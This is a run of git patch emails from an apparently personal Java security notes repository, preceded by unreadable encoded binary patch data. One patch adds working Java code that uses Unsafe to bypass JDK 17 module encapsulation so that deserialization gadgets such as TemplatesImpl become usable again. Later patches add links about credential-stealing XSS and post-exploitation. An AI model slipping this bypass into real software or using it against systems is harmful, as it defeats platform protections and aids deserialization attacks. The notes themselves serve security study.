zm89Lu!k~pI?&>IB@%X>_#(C4c2eAeJ!W$|#cQYFW%OCGjGD*8MTlh~s_|W(VBcc4> z9iHPT&~Bo-?cr`WVwK}z4Y0!O-Qm6SF+#?}fOnH@REOj~r1HseD0O@cJV-U%bCma~ z<0Te7V^3YrKq|sqs(!DPddnjzZ2Z7~;X?HJSq#O@flRqJ7->1NoY9N|%h-6lT)1hX zF+zA>b>p3u76Kk#tF@CpP;mcumw@eyiakqA8uDA*ys70V`1|Ijm`~9@M-%IB-pXcj z@n_LWoH#y~#2A>s0RAtkQaKH7ZkcPmtp89-?-g_-4gGc{R?v95*!-thh#LWT@Wf7e zlO%()&&S&8sKR4@L8$o~olKQK`^~5x#eeo&z0Y%Vo%ub$v38$*G6v5b3rq5i*o7B!zxRv4d=emUab%s7=DFrx-`;Ql^bkE?fe7*mjCH*1QE4FJEZ(<`5N3IF!t z$=?*9jScyg;O-yIw)Dwf(cjEImt~SW$FNWAXnc4(`Uk0cq_i;!qJFY5g8txKN7Gax~AfUkbSBRf!&oEH8*S?+BHM26sZka6C} zqq~eK99frfl~oP6;ss@pq}w`f_BmDCti{kK1$C{n^DHaR#E5M(Jt02lWkZF3YNjc~ z!D?Q3t5FB+l$Zd9q4bOVqAfI$N-B4oWKne2`)$F^&ArE6TzocJSbW!+5aR%MT2E{; zT&Tv%kD_%m!)j7}Q1;+@3afWLi!N|<)1my-+!nJqBRaeyw#WNKGTz+!$K(L!RURLq z6T|GSBDndg?b4Bv5Hd>OoCuj%aK70hc)$Pq0b}O_6ptNR+-*P&s=c|5u@e{z^p5F% zij}d$FD}SQ^(nB^p>&hWf|lJVs~6^AY?r|-IhN})r(o3tSq%9mWuH`h=7uOK`QS1Y zk25njfx`Z^IL1H8JT*GmSUJHUpn#t`o@4TE`>Vy%ZzbZ?=8DgVcsI97#9S76)n7Y` z#?NhX?c^vwH4#-0-toS;&os!YsPLZ~vp7%O#|&K>+n z?n6ildfVhbCR~%q3qhOHG+<53)excMwRbE0B4qYZEfA`ARSVJ`4B+tXPic-n~ z=9J`?l+f;;a&+Spo2C1q>*=8A{)iS;haJK_l$vX;A^LnI;p?eVAk;RNE+7!m@@ybP zCE+@tBpP3FVfw(d^U$Cl)TY0wcAfdMJl-zYO26}K zrm7lzvn@-lGfHljc@4Q*M#d8B)0IN8EQM*biRzzIkdy9_bfsc${RO6Ey~*413zX5$ z^I{0VV*S}og~!TI!Z!BV=z}#UIV%epwNt?xD%6Ri6}h>NSafFfAJypgf+-V7+)^aR*^1b&rKo17P#M>=7LRRb$xkdp{7yXt4Ixw8bZAzS zRvPiK#&{xejn5I7Ex9x_9XyPDojgCzJ8ep@JRRI#D0<7O=V-KJvA5SUw#}4wpX~SP zhVDb+u<=Y}@K)ENs@x>MCw-gq>*h($D(KX*rRCvid-&7vV7m-}wYn9Q1S_mWS}6BU zaX)Bd4OicD>zjV%e(65&#vhKN`5~1?z;|ltaiga$}>mC z+ySJj9DTy`G6o@4Qw8Ze7eXZt!i8p}dJ9JQEpV2#QN-NhDVYUk(Nl!bT7XiP%J6;h zLCb*>4Mof0OtBEw&vp<0&DJpVSzc8{$-q@1AIBJNB?(Uz8Jlon6e$p%_TVbTk ziVC|lZ8UA$DQO*W>}g=oiChvfi!hY3pk$o!8rNE*I!#(orA6Wz&YrCvtkQd?-cI_I zniSOrGa{^*7(&nVv<07+v0EJ3=D}78vfFp8lRV`x8#66G0qeN_2HU@V{pYVxE0cC6 zzHed&np6lx&~=TAoAm(kSogTZ*jS3)Cqr6^>&vm7pfR1Fby0~iZ)vsalLjLgaS|Ea zHi~wnX#2tEi5PQIra9Yoh0a^r;AL5>0|noCB(z=W8wM&0p%`IVNGnu5_@%FY=DTc& z^O&RNmw^@ErnZ{Clm8(v&~1e!Y#`+s?0gP%1tPU*a(Jip;+v_FAjak8}+8$8ln394>ZnHR+R0%c5LnV`t-#tSM)2;@Ixt%-0-D{zy zoG@tYC;x$Z*8pA0v2l{8H7RfkhY3M<@vX04hKB7iNm*K93W3~@$Cvp{5nVB8{+tCcm$IISp+3s{flNKu0_ra*%l;twnB37!9y#}{j~$i4MZ z^!d3h%*if?-nx=uOsqD~*4E-HAa-Z4Qni)FNeRHE+}fOm|GchgaSkU*;C_ebMq|9uAWMXlJ01YhRx98Mb5CWTa; zGj|`iGxi6z`w^oy8(wwnjVYcJo}nUy!iF}>2&WaN+UA6IrerWx{PsGEOd^!^eh8%x z#Ejz~j{hj@xV?nsw#hywTx|X%XftFW5kFDLa@Ckm*0tl*Sz`scr!H*kuN=pRcIAc0 zd=!Y?N{!1MPm4w?vRzo zxHWxD<29Yk~f7l|BfwZ!t)yTgQg1y!epK-R&b!=&dQn2*CJ=}mp z>*v}LqhLBcskj}$UcyLq98!AsHs<2+M@X^_q^kmjjg?>;Qz^81(BrXn&Hk^M%k24B z!E{IVAwhKO;apO6?RW#RvW$>KGqGYhJ9~0wOu3N#E#;W3zG_ldmH@pB2A6Zm3=nBdJ9+cl|b3%9M zdcj1ZwiAE~%&s5Zack~%l*WRtO+Y3ZiRU;%jBwuzOjoQm^v3LIZmM4YV;NG_`6!aZ zrwYT}buyY?xI_L(4PY3%kL%7STS^7%tTAwF0m00{`1YGT+bW^$no3`$*y%zQw`Rhb zbNh_X_7H9+;gVmxM!9MDU&strQ%Z>buLxHqnG!pB8umUT{pq3fpO0?01~y_7`9J7j z{e}oI>6FoRq}GO-r>Wjv&IPS6iRwX%v09DI_|viI?NFextr4`R2X;6al-98IhDwPa z1^5SkLoD(1N;-2X8Y(Krce8X@(I7!Yx)fT1P^#3(>mT^&a z?HX4MRFsk$7(hCtyHTW(ZiZ008);BPB!(VpK#)d2kfDcC8io`EhVG#R3F$a{^nKp* zp7Z6L`7)pOZ?CoX+I!vib^Y(P7(zchJKhF2(oD1A_Od;Gr+7TcNo<=&2&9!Vw_AZF z-JPY7qTIHzgwL@Da&O_6uK6y7n3$ZLT%B=QXxs2H6s4jFEc*8 zH4?&f7Y%-NqZ1B|5E|Fa6%H=}x-4Ahwsc!~k+Re-@2o-Gz~Q3C-~xnfo>JF;%i_yP zxoZoiPMV0OhyZ0EIR~kP`KWb_B)UYSedtXlQ&b^vszXHbb&sr^g!NJb&-Y6q2l)?U z0SIhqp1o6WJkz&6jOY}8Y}72}T88Mk*TMBX@DrXtU5k?6@B@Oh{tZt7UAfAYatDBc zVJHKkuC*_*yZzXf_%SR-7WDZ+o`Vy6+Yf zh#3VIh0W_q#uralj_M7zWFm`;BBAtl?G}{Ens>_*h?OHroZEGD^6%(Z;Bi|0Bw3Ps z%EitL)osK*CI31-%Srpu z;!89vu<(>tcw-Sz?MvQQY@6JFZy70delyS{T|+$}$woe43q1MMEAo~?aTp!wqd<%4 za7zym0!fWlWfktw-zXS z`R6kF>6N;XVFmVzh)|C7i`Qi@w^kD5GI4t2EYZd#S_-;d&nYG0ic^fCc0B-+Z*MnlaWRP^5-T1Qo_|Dm&h|`A6TaeNDRKDqt#= zm{rAK;g6OielAHvVa{{Sumxrlcak)HiL+^7x{|*i zj4%VHT`&nOvP>tjnmr)l!ab;&4C}^GxvtO`{(2JDP1FEZb6-`)Fk;T928aCn-!Tw= z=@rO<6i^*inn-t5t2QwdchjF&e;I58;8oEEl%r|TA z^VxctN4oFE`FhHXgz!1nvA77h2+?!oc4_wlw`6u2wH<#1Wh1fs!&J@>>lNbFk02abEf=& z$2IVyw!%KK=XxWjYy|PbSr$jGLycV<504C%`!PPN6Adx$H2(UyG>SjclFWoG-z}QA zDb=}kp>#|sKGyxD)!N|spr96frfKx}$%szSRT~TS?KQvctdW=WeuAd7$GsASC!+k@ z(Z{cU19VQC^G4sNwYv(oe*DKmS}V=6!FssyndUZeGt3)Ox{-`ZqNkZ!0=hPbW(^aG zYl#jgi!UD24l|K}tmU&T1|9TybLg11uNDc_ArG?6=3P;>5dzzodi7)+c8QZ`LBI0Q zK~00dCI$IU$9}EPNbK7aD&YioY1$9a%KM#q=qSa}#Nz_hCKDP;;{uDRMA50kei7Y+ zDhIWV-G+uZb3%ubwGj>dCTp$0JiORAQ|!IrdB4=cezbq}R9Eqdr6a*07>`~BeYRXq z6Fh#PLwWSG34R;V=Q!!n2SjA^x$MZiM=B}nE+@?TwMMU;Mxs1F1P8t(@0v@BGaHSStS zo@^vWJ!;EM0hPM63e$lHfM`hQD^%xsGi8qM4oCX3Y6X^g8F{{OWWQD&T}xy2X!nsFUFbHi>3wCW8l4p~)JnynUP1vPhWA7;on0YXh}~t;;ntK^ zU~97ZX3N)DnvDFes{GEt2YnNci~QUHnVpqpi-^)?nD)3}&7mYLq0DU#pK{PJrj1>D zU@0_UiqFxmSv%=5&gL3{g!ANg%^HDZeqNmDGaAbR%w26VT7aGcPD^-fJQRJl;6C_r zZCY(}Yay>JkZOIibk%)ush|(==o+6W6h)+fS2%=G{u0&OJ9*-&9^(sLc3vV|j4V%? z@g)att^^Dvh1~H2kcaQJ@Sl_R@1MkKwf|mTY?_I$43wG$|uLwIj_zg#H z0Q6x@Xxe~Y29W0sR2y&G)vQ;h#Mr3>hpBp2pNBdeod+sQ+y0gul=gxhjY)J$dqXe@ zfirK8o+bwbSeuE*nhKn9T#<*_a#qtXL)rR}jJeRQ#ZL?VK3fjldA|)4*lhUh@h*a1 z9qd@x99M$j*W{9m?vL^i+OCRgAqL?Tcj230bG5YOc#=2)Qj_;*Q}2B?wnrL=4(-4D zE^4`+z}KcAJ?}8-CukVdauQ8mc$xXuh2{5mYM-zYAVoTq3b{JIKC3o@I%{shPz_4= zbuQuhKoAFeBHYa-4E0joxi!txzdkUwi@lJkCF8~0%`Zo7RYFR@Tdk$E_T9QZPmv0Tjrp|YyTHy#|F#<)uh zCyJqnoz@S|QIBm7F>|3yxC1M{XDzyFn<FZG!i~yOhcTuLJ%a%3IUT)hcsOn-vjFuH{C9wYbHz zfW`E=Aqw~PotLy6lZBfZE71TNbz^Egg&%w`WG*~ZoT4{{OWik-1%&?;_b)UXhGWTl zDfz11sKGYUu$ZlKpkI!x7GyX-rI`OmTNi8anUw&bR1^yaCmh<8OfgCkBl}AbC$aDt z4eP}G01aeND3n~17?~r@XwGB5M5sv6(t9)%RDG);i_NBA+S{?@apkTk3Ntnil?hGr zw}eTbCuDuN6n|9;cz(xR!(OBT%gSW_ybNH{%S6R`=w27=WH9*SR6|zTB`vY|l}RSe zU3wN%WpDvXEz`2yF_-_=#CIrx#}>^h^oRU6J8Q$J@o&l2h^j1(p0#}Ek>u^%-l_<| z66lSp+j>-3<9Fi+4Z-Yzrw~NUqa8}|Ait;nnwHbLo5%c=Y|_-*hJD*&j-$Fd!q^;B z8vac}wI9{vZ>LJLz5!@fZRMv@@PO(HS!*q?zi$K*Q_{8x^5WTkp9oMigfv2i?(*^v zhtvq)&|aI2 zwyjEJ%$|~}Z~^2oU(0WtZ?P3Me0}TWK{9vlnv4v4-j$1gG9F*GTn0lriB(wkiaI9l zwy@`cxafL%n$Hs{ zy9*SCzdUUl78vt@YQP5#z6%JjeR`-X=!LVE5ZeBSvwbTDXGELYdwNPZBDRly4X#gL zuxle=Rr&Gz5)y#T@r3Za-l;o>5JLItOaAm=F&N|OcZv2)Haoys5da6GGlTKWD`x!x zuV;}lBe+mBaI$&ToHS`GpNX(NvQMBuu~1Ak8gW$VB^IdH4wTr4I$)^@a9n&61+VTi zw;o%2unC({oi^9_1ikMYCuAiwr%OYyqb4j@l*^U7CcRKw%wqmKTv)@wfx}WJ&%>r|#C`MWu^d?q^ExgDdO)&Ijk0i!G^X=*cxlzE&be*kVq*ntOH$ zKkW0N8-WW^0!d_)r?adJq43RCUE?*>fYyXoYNCHjw_#JaE03J~dW|Z}xEHmq?#X=3 z7TzpS2V3CKJ>Inzw0*qyg(;n%Ga|ISg2IYd>cX0nTRK5Yb{A)s1k-G9J&{pn3Ka1k zwlhC4jeU>Cdm8sPz{P)oD{jb>f>@i~MW_>n%xD&Q32?UlL9J(c2RXj81}IG&RR$W| zyya1AMv!6rkZw|)z4KRk6q>pifO0@WE?a~@holmqr4*aOo&C=c=AWBb)6=VpIz@Z* z3K*%ZQXPCJQA7O7FsQ0AF(R=@zqdMmMB-{obC%^yUc_3@w)kFTNJgAwTDfCy;ilMO z;5Vf+ClLdie!KSSs-xPy0RPmnU{Kel8&!?$ka2kh57~IK`R|;>@xL4ZFipNu(H?R#OI@&p zMOV`-4O6YjG1XaGI1)t{s09xobyV-wRJ_x)bwB^|5nIq)r)_{fYAlCp(TDb*Xf}6- zRefNKP8t3#8`?^rLN3<%32iTQZ2yT(vY+bVt%4g%D}LDOY8)$0#=-i6eZh)+psp97 zM{xS9ZaT(a&t|ipNk^L&1(5Bl;x0S2)NgRS;g$SYmlsOhWp|xexuRY#!i5T=tiHd$ ze^{;Ji0Kbbfl&l^L_+r#2o{qV`kqr^E*E#@$0o@=Vj4SJE`zB6Yp~^IuFdEda;5BJ z?f{=~!23AA{IwJt2PKMkyZBvs;B+i0y@l>ajc+C*lT74Kf-gAA!IA^QHDvZGrpll9 zQlmIU^Y)!ARMw07lbc%y%h-#G?PY0^o7#>tBLV`dsCqUirM_laSpD{=tXfW0Om%+l zffZ2Q*b=GxK4V6Ui zcgek}EM4|_`@*wvOS2MUg|DkA^zIb9WOukcMWN16i zQOvDXHGM_sh^mvc0FN(GwdqcuMXkutjV6elmRa-`~fEx5$#Ruo`k6& zrlOvSVHqQufdlZPo1ysB+14LZo~mz%>3QT_6U6{Go36_DgM{3Xo;#D1FS|^5D>*BW zUe_L9*eoZ4+8%ZLaa>l+`VhQjSa}UXsalaQBNW}!?*bL`Y>Lx*f0{efjmMP@E42{K@@6XWrvE2X*-h8#SS<1ta|MI(1^ZAg6VT&nxN{a$AO-h-BQ zgAP1Lw9&vP9fNpLjgoG+OQ4syuwff6Vqc;TPY<8<$;LvFG4P6dcRCau{kk@%U$1)igNS|6G2u zA999>c;?SGl_Hlc$2M5cJ;)Ztp>4|H^%vfA;1rzAIG~XBDgw;U{86^$SZqT3sI~m6IJ2SmwYlPLIJ7P9<6g2_H^e zo+FHTaqxedKu5T|g%E4l)V3rjboItn45Jcjv zJS%O1^9fK%XJ_$%NpWIXnF=w>&g~EsIP+X@ccbn}5+~N=QAbGl->i)kKWW0Km8ApU zR}cq!ViBK-ENaG{=qAq7>x^Sz+}Hl`Y!bCYwtfDej!k^GV5G6!YgrC52AWuw0xd`| zynraSt3QP-f?j_(N1W>0wq8>5Irp4C1KrfQWjZY}LQqn4sm@i1>mIf~Z+{3`&Q?JO zohNhqKW&_Qa2X%m1%NO6(LD5hc@OFwYPCoDy%vyXPQ}MeSE&~igCK~ED0l%=5F|#< zFgd!PDf#QLZ9H@oVxN*A^`2FR4w7(=Fyx48mWdlCOkABn`}*c zbxt|f1Of0#+}-9cJXp%KPBJyB&CSY%5=$5h1A%2U+iWqCaX3jYw6Iz}Kknx$iuvy~ z*v%qBP8JXa3|Qjs#Y@&mJXP)fetWW74yD#!1;$`s*RR^{CctSJOcN`rvp4HFFjjfBeV=<;T5>CFR* z^2gp|Z%f#=WY^vJdZkY4`d`Q=UvLb1`|VdFo zW;Shz2Nd7Tzp`X<`qR5V&diQWJXfc&VVK|ddvO?GYLi>; zCOuW(?PwxN8n1a;UYcJ$p!%23#2S@0lFs|5?QYQUUTnGkP#BScFM9RP=X{H=VwrHY zN30}m^{f)mzxVmu|5C=#Ha9jbi6q{)^7{<5C1CP8QNdPJz}fVL_nt|CG*6~vmcX=^ zL;bYJO|dE4e^)U7no%&r{Dnyodpr3SVxqbY^cv3q?er}Lem7_I%5&(GrRLk#esEC= z9M-}=I>ArAeWHJj`#*mOfEQL#Bh~#AJG(ApH=_`ye!T>)%79`E<+eftw9BtEtMd_u z;L~S_^5Sn&L6>HA>-s(ZMH$tCd2&b@EXtYovP4E5&!=jm*=wo1F@)(`9X`Mr0RV0G zpS=~K1MW6prN&gijGLDEjy?Sb&$o7mj8AiK#=Abd?V*J#|9AWD$u Date: Wed, 21 Dec 2022 16:15:35 +0800 Subject: [PATCH 224/332] Update Readme.md --- Jdk/Readme.md | 104 ++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 104 insertions(+) diff --git a/Jdk/Readme.md b/Jdk/Readme.md index fd5b9b0..7c4acd2 100644 --- a/Jdk/Readme.md +++ b/Jdk/Readme.md @@ -64,3 +64,107 @@ public class bypass { } ``` 参考:https://github.com/BeichenDream/Kcon2021Code/blob/master/bypassJdk/JdkSecurityBypass.java + +jdk>16 + +jdk17 bypass module + +https://www.bennyhuo.com/2021/10/02/Java17-Updates-06-internals/ + +https://github.com/BeichenDream/Kcon2021Code/blob/master/bypassJdk/JdkSecurityBypass.java + +在jdk17使用反序列化的时候发现要报错 + +``` +InvokerTransformer: The method 'newTransformer' on 'class com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl' cannot be accessed +``` + + +![image](https://user-images.githubusercontent.com/63966847/208854101-cfe0eee9-5882-4450-9d82-7092d353e30c.png) + +限制了 + +![image](https://user-images.githubusercontent.com/63966847/208854137-7c56007c-ac54-4490-8f30-2753cc0e52e3.png) + + +限制了的类https://cr.openjdk.java.net/~mr/jigsaw/jdk8-packages-strongly-encapsulated + +## 需要bypass + +``` +按照提案的说明,被严格限制的这些内部 API 包括: + +java.* 包下面的部分非 public 类、方法、属性,例如 Classloader 当中的 defineClass 等等。 +sun.* 下的所有类及其成员都是内部 API。 +绝大多数 com.sun.* 、 jdk.* 、org.* 包下面的类及其成员也是内部 API。 +``` + +**code** + +```java + +import sun.misc.Unsafe; +import java.lang.reflect.Field; +import java.lang.reflect.Method; +import java.util.ArrayList; + +/** + * https://cr.openjdk.java.net/~mr/jigsaw/jdk8-packages-strongly-encapsulated + */ +public class BypassModule { + public static void main(String[] args) throws Exception { + final ArrayList classes = new ArrayList<>(); + classes.add(Class.forName("java.lang.reflect.Field")); + classes.add(Class.forName("java.lang.reflect.Method")); + Class aClass = Class.forName("com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl"); + classes.add(aClass); + new BypassModule().bypassModule(classes); + aClass.newInstance(); + } + + public void bypassModule(ArrayList classes){ + try { + Unsafe unsafe = getUnsafe(); + Class currentClass = this.getClass(); + try { + Method getModuleMethod = getMethod(Class.class, "getModule", new Class[0]); + if (getModuleMethod != null) { + for (Class aClass : classes) { + Object targetModule = getModuleMethod.invoke(aClass, new Object[]{}); + unsafe.getAndSetObject(currentClass, unsafe.objectFieldOffset(Class.class.getDeclaredField("module")), targetModule); + } + } + }catch (Exception e) { + } + }catch (Exception e){ + e.printStackTrace(); + } + } + + private static Method getMethod(Class clazz,String methodName,Class[] params) { + Method method = null; + while (clazz!=null){ + try { + method = clazz.getDeclaredMethod(methodName,params); + break; + }catch (NoSuchMethodException e){ + clazz = clazz.getSuperclass(); + } + } + return method; + } + + private static Unsafe getUnsafe() { + Unsafe unsafe = null; + try { + Field field = Unsafe.class.getDeclaredField("theUnsafe"); + field.setAccessible(true); + unsafe = (Unsafe) field.get(null); + } catch (Exception e) { + throw new AssertionError(e); + } + return unsafe; + } +} +``` + From 63b0ceabd7324ce197f5b7ab3ca1b6b60952fa7e Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Thu, 22 Dec 2022 12:40:21 +0800 Subject: [PATCH 225/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 2 ++ 1 file changed, 2 insertions(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index f3aa154..22a163a 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -218,3 +218,5 @@ + 2022/12/17 [java.exe和javaw.exe区别](https://blog.csdn.net/xtho62/article/details/114085591) 在bp启动的时候看到了 + 2022/12/17 [Weakness in Java TLS Host Verification](https://blog.h3xstream.com/2020/10/weakness-in-java-tls-host-verification.html) **字符编码绕过** + 2022/12/18 [Java使用 try catch会影响性能?](https://mp.weixin.qq.com/s/kkEGvMwaG6J1WrD_DWRRzg) **不会** ++ 2022/12/22 [How I was able to steal users credentials via Swagger UI DOM-XSS](https://medium.com/@M0X0101/how-i-was-able-to-steal-users-credentials-via-swagger-ui-dom-xss-e84255eb8c96) ++ 2022/12/22 [浅析自动绑定漏洞](https://xz.aliyun.com/t/128) [浅析自动绑定漏洞之Spring MVC](https://www.mi1k7ea.com/2020/02/12/%E6%B5%85%E6%9E%90%E8%87%AA%E5%8A%A8%E7%BB%91%E5%AE%9A%E6%BC%8F%E6%B4%9E%E4%B9%8BSpring-MVC/) [Spring MVC Autobinding漏洞实例初窥](https://xz.aliyun.com/t/1089) [Autobinding](https://github.com/Cryin/JavaID/blob/master/JAVA%E5%AE%89%E5%85%A8%E7%BC%96%E7%A0%81%E4%B8%8E%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1.md) **Autobinding漏洞,代码审计的时候可以关注@SessionAttributes,@ModelAttribute注解** From 2c555b4d7fddc1d2e7574a28197127df62a66be6 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Thu, 22 Dec 2022 13:53:25 +0800 Subject: [PATCH 226/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 22a163a..4ca5bb7 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -220,3 +220,4 @@ + 2022/12/18 [Java使用 try catch会影响性能?](https://mp.weixin.qq.com/s/kkEGvMwaG6J1WrD_DWRRzg) **不会** + 2022/12/22 [How I was able to steal users credentials via Swagger UI DOM-XSS](https://medium.com/@M0X0101/how-i-was-able-to-steal-users-credentials-via-swagger-ui-dom-xss-e84255eb8c96) + 2022/12/22 [浅析自动绑定漏洞](https://xz.aliyun.com/t/128) [浅析自动绑定漏洞之Spring MVC](https://www.mi1k7ea.com/2020/02/12/%E6%B5%85%E6%9E%90%E8%87%AA%E5%8A%A8%E7%BB%91%E5%AE%9A%E6%BC%8F%E6%B4%9E%E4%B9%8BSpring-MVC/) [Spring MVC Autobinding漏洞实例初窥](https://xz.aliyun.com/t/1089) [Autobinding](https://github.com/Cryin/JavaID/blob/master/JAVA%E5%AE%89%E5%85%A8%E7%BC%96%E7%A0%81%E4%B8%8E%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1.md) **Autobinding漏洞,代码审计的时候可以关注@SessionAttributes,@ModelAttribute注解** ++ 2022/12/22 [渗透必备!文件读取漏洞的后利用姿势](https://mp.weixin.qq.com/s?__biz=MzUyMTA0MjQ4NA==&mid=2247539336&idx=1&sn=81cd9e896db0dc9febd9f44bfbb1c69c&chksm=f9e335d3ce94bcc5894e9a6309ec200b8761d8eaef611b07c21fffe01459c71b1f4b686486a0&mpshare=1&scene=23&srcid=1222fVGVLCHXZOEVl7ECdKpe&sharer_sharetime=1671640052561&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **/var/lib/mlocate/mlocate.db 文件比较有趣 centos默认有 ubu默认没有.** From 2281f68f8c506e035b182a1d1879b266d5ddb770 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 23 Dec 2022 19:59:39 +0800 Subject: [PATCH 227/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 4ca5bb7..e763ad3 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -221,3 +221,4 @@ + 2022/12/22 [How I was able to steal users credentials via Swagger UI DOM-XSS](https://medium.com/@M0X0101/how-i-was-able-to-steal-users-credentials-via-swagger-ui-dom-xss-e84255eb8c96) + 2022/12/22 [浅析自动绑定漏洞](https://xz.aliyun.com/t/128) [浅析自动绑定漏洞之Spring MVC](https://www.mi1k7ea.com/2020/02/12/%E6%B5%85%E6%9E%90%E8%87%AA%E5%8A%A8%E7%BB%91%E5%AE%9A%E6%BC%8F%E6%B4%9E%E4%B9%8BSpring-MVC/) [Spring MVC Autobinding漏洞实例初窥](https://xz.aliyun.com/t/1089) [Autobinding](https://github.com/Cryin/JavaID/blob/master/JAVA%E5%AE%89%E5%85%A8%E7%BC%96%E7%A0%81%E4%B8%8E%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1.md) **Autobinding漏洞,代码审计的时候可以关注@SessionAttributes,@ModelAttribute注解** + 2022/12/22 [渗透必备!文件读取漏洞的后利用姿势](https://mp.weixin.qq.com/s?__biz=MzUyMTA0MjQ4NA==&mid=2247539336&idx=1&sn=81cd9e896db0dc9febd9f44bfbb1c69c&chksm=f9e335d3ce94bcc5894e9a6309ec200b8761d8eaef611b07c21fffe01459c71b1f4b686486a0&mpshare=1&scene=23&srcid=1222fVGVLCHXZOEVl7ECdKpe&sharer_sharetime=1671640052561&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **/var/lib/mlocate/mlocate.db 文件比较有趣 centos默认有 ubu默认没有.** ++ 2022/12/23 [红队实录系列(三)-WiFi 近源攻击实战](https://mp.weixin.qq.com/s?__biz=MzkzNjM5MDYwNw==&mid=2247483774&idx=1&sn=8808bfa1445f6b516077a1af244b761f&chksm=c29e3bdef5e9b2c89e0b607a08f098fca261228079259472bef46c645d8a83d2e1ed955f9ffe&mpshare=1&scene=23&srcid=1223e1e52DqpkBFnt02jHE7R&sharer_sharetime=1671794034434&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) From b90b5259a380a49f15aadf28ea88da6f73c028f0 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 23 Dec 2022 21:39:48 +0800 Subject: [PATCH 228/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index e763ad3..df3590f 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -222,3 +222,4 @@ + 2022/12/22 [浅析自动绑定漏洞](https://xz.aliyun.com/t/128) [浅析自动绑定漏洞之Spring MVC](https://www.mi1k7ea.com/2020/02/12/%E6%B5%85%E6%9E%90%E8%87%AA%E5%8A%A8%E7%BB%91%E5%AE%9A%E6%BC%8F%E6%B4%9E%E4%B9%8BSpring-MVC/) [Spring MVC Autobinding漏洞实例初窥](https://xz.aliyun.com/t/1089) [Autobinding](https://github.com/Cryin/JavaID/blob/master/JAVA%E5%AE%89%E5%85%A8%E7%BC%96%E7%A0%81%E4%B8%8E%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1.md) **Autobinding漏洞,代码审计的时候可以关注@SessionAttributes,@ModelAttribute注解** + 2022/12/22 [渗透必备!文件读取漏洞的后利用姿势](https://mp.weixin.qq.com/s?__biz=MzUyMTA0MjQ4NA==&mid=2247539336&idx=1&sn=81cd9e896db0dc9febd9f44bfbb1c69c&chksm=f9e335d3ce94bcc5894e9a6309ec200b8761d8eaef611b07c21fffe01459c71b1f4b686486a0&mpshare=1&scene=23&srcid=1222fVGVLCHXZOEVl7ECdKpe&sharer_sharetime=1671640052561&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **/var/lib/mlocate/mlocate.db 文件比较有趣 centos默认有 ubu默认没有.** + 2022/12/23 [红队实录系列(三)-WiFi 近源攻击实战](https://mp.weixin.qq.com/s?__biz=MzkzNjM5MDYwNw==&mid=2247483774&idx=1&sn=8808bfa1445f6b516077a1af244b761f&chksm=c29e3bdef5e9b2c89e0b607a08f098fca261228079259472bef46c645d8a83d2e1ed955f9ffe&mpshare=1&scene=23&srcid=1223e1e52DqpkBFnt02jHE7R&sharer_sharetime=1671794034434&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) ++ 2022/12/23 [漫谈 JEP 290](https://xz.aliyun.com/t/10170) **总结的非常好,在weblogic中启动了全局的过滤器那么如果存在一个cve是jndi,能不能通过ldap打本地反序列化的方法去rce?不能!!!因为ldap打本地反序列化需要有一个gadget虽然weblogic中的gadget非常多但是都被黑名单过滤了又因为是全局过滤器所以在ldap这条路也不能用。除非用jndi......就又一直重复了。** From 30ecf7ac2f030fee93742e66a58f64d835b91a5f Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 25 Dec 2022 13:53:42 +0800 Subject: [PATCH 229/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index df3590f..7198c30 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -223,3 +223,4 @@ + 2022/12/22 [渗透必备!文件读取漏洞的后利用姿势](https://mp.weixin.qq.com/s?__biz=MzUyMTA0MjQ4NA==&mid=2247539336&idx=1&sn=81cd9e896db0dc9febd9f44bfbb1c69c&chksm=f9e335d3ce94bcc5894e9a6309ec200b8761d8eaef611b07c21fffe01459c71b1f4b686486a0&mpshare=1&scene=23&srcid=1222fVGVLCHXZOEVl7ECdKpe&sharer_sharetime=1671640052561&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **/var/lib/mlocate/mlocate.db 文件比较有趣 centos默认有 ubu默认没有.** + 2022/12/23 